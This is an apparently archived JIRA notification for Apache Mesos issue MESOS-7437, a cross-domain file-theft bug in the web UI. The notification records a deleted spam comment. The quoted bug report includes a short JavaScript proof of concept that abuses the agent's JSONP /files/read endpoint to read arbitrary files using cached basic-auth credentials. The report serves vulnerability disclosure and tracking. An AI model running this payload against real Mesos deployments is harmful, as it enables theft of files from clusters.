[jira] [Issue Comment Deleted] (MESOS-7437) cross domain file-theft in the web-ui

Gavin (JIRA) Mon, 29 Apr 2019 02:30:31 -0700


     [ 
https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Gavin updated MESOS-7437:
-------------------------
    Comment: was deleted

(was: www.rtat.net)

> cross domain file-theft in the web-ui
> -------------------------------------
>
>                 Key: MESOS-7437
>                 URL: https://issues.apache.org/jira/browse/MESOS-7437
>             Project: Mesos
>          Issue Type: Bug
>          Components: security, webui
>            Reporter: Jacob Janco
>            Assignee: Jacob Janco
>            Priority: Major
>
> {code:javascript}
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for 
> example, will yield the contents of the requested file. Basic auth is cached 
> and resent in browser tabs/windows as long as the user has authenticated 
> during the browser session. 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

[jira] [Issue Comment Deleted] (MESOS-7437) cross domain file-theft in the web-ui

Reply via email to